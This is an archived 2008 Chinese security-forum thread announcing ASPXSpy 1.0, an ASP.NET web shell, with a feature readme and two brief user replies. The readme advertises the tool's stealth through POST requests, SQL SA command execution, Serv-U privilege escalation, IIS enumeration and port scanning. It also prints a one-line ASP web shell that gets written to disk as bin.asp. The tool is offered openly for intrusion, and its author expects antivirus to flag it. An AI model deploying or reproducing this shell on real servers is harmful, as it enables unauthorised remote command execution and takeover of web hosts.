邪恶八进制信息安全团队技术讨论组's Archiver

binxcn 2008-2-2 16:07

[原创]ASPXSpy 1.0 测试版

软件作者:BIN [20NT]
注意:本软件首发[url=http://www.rootkit.net.cn]BIN-Blog[/url],后由原创作者友情提交到邪恶八进制信息安全团队。转载需注明原始出处为[url=http://www.rootkit.net.cn]BIN-Blog[/url]。

AspxSpy 1.0 Cody By Bin[20nt]
Readme:

1.开发环境VS2005 + C#,兼容FrameWork1.1/2.0,基本实现代码分离。

2.密码为32位MD5加密(小写) 默认为 admin.

3.采用POST方式提交数据,增强了隐蔽性。

4.添加了IIS探测功能,遍历IIS站点信息。

5.增强了对文件属性的修改。

6.在SQLTools中增加了,SA权限执行系统命令功能,SQL_DIR 功能,可以直接备份log/database,到指定目录。
文件名为bin.asp  Shell 为<%execute request("B")%>

7.增加了 Serv-u 提权功能.

8.可以对端口实现单线程扫描。

9.可以对注册表进行简单的读取.

PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下,估计很快就会被K,发现BUG可以到[url]www.rootkit.net.cn[/url]反馈.
  E-mail : [email]master@rootkit.net.net[/email]
  
  感谢 Snailsor 的技术支持,还有Fuyu对我的关怀!祝大家新年快乐!

cchhd 2008-2-8 21:23

4.添加了IIS探测功能,遍历IIS站点信息。 :sad: :sad:      拒绝访问
8.可以对端口实现单线程扫描。        21端口用命令 netstat -an  是开着的    扫描到的却是关闭的

binxcn 2008-2-15 10:27

当然了,这个是服务器权限的问题!至于端口,禁止本地登入21也是正常的,情况很多!

页: [1]
© 1999-2008 EvilOctal Security Team